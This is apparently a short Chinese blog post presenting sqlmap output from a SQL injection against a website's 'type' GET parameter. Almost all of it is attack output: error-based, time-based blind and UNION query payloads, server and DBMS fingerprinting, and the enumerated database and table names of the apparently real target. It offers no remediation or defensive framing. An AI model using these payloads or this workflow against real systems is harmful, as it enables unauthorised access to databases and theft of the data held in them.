存档

文章标签 ‘注入’

一种mysql注入方式

2016年5月31日 没有评论

某网址地址是:view.php?id=177&type=zxxw

注入如下:

ected
GET parameter ‘type’ is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 5474 HTTP(s) requests:

Parameter: type (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=177&type=zxxw’ AND (SELECT 5429 FROM(SELECT COUNT(*),CONCAT(0x7170787671,(SELECT (ELT(5429=5429,1))),0x717a6b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)– TqJA

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=177&type=zxxw’ AND (SELECT * FROM (SELECT(SLEEP(5)))wqUP)– jRzd

Type: UNION query
Title: Generic UNION query (NULL) – 2 columns
Payload: id=177&type=-9914′ UNION ALL SELECT CONCAT(0x7170787671,0x54726c526a56484f564e75526a5459584a4a4f4e71474753627055557842696d4676494850484958,0x717a6b7a71),NULL– zfmK

[15:41:32] [INFO] testing MySQL
[15:41:32] [INFO] confirming MySQL
[15:41:33] [INFO] the back-end DBMS is MySQL
[15:41:33] [INFO] actively fingerprinting MySQL
[15:41:33] [INFO] executing MySQL comment injection fingerprint
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: active fingerprint: MySQL >= 5.1.12 and < 5.5.0
html error message fingerprint: MySQL
[15:41:40] [INFO] fetching database names
[15:41:40] [INFO] the SQL query used returns 2 entries
[15:41:40] [INFO] retrieved: information_schema
[15:41:40] [INFO] retrieved: c211structure
available databases [2]:
[*] c211structure
[*] information_schema

Database: c211structure
[9 tables]
+————+
| ads        |
| banner     |
| cases      |
| dpedithome |
| dpnews     |
| dpnewsEn   |
| edithome   |
| flink      |
| news       |
+————+

分类: mysql优化 标签: , ,
css.php